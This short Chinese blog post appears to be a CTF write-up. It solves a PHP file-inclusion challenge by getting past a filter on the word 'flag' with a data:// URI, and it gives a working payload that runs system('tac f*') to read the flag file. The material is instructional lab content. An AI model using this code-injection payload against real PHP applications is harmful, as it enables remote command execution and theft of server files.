博客介绍了利用PHP文件包含漏洞获取flag的方法。过滤了flag字段后,可让包含变量c变为php代码,通过include函数执行。使用data协议获取flag.php内容,上传特定payload即可获得flag。
过滤了flag,即c中不能有flag字段。
include包含变量c,因此可以利用文件包含漏洞,让变量c变成php代码,然后通过include函数执行。可以使用data协议获取flag.php文件中的内容
data://协议 通常可以用来执行PHP代码
data://text/plain,<?php system('tac f*');?>
上传payload:?c=data://text/plain,<?php system('tac f*');?>
获得flag
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
